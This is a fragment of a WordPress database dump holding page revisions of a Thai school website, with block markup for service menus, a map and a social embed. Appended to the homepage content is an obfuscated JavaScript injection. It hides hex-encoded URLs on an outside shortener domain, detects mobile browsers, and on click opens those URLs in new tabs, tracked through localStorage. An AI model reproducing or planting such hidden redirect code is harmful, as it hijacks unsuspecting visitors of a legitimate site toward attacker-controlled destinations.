kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-21 10:01:17','2024-08-21 03:01:17','',14,'http://pakhaeng.ssk.in.th/?p=1039',0,'revision','',0),
(1040,1,'2024-08-21 10:02:27','2024-08-21 03:02:27','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":6,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-6 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 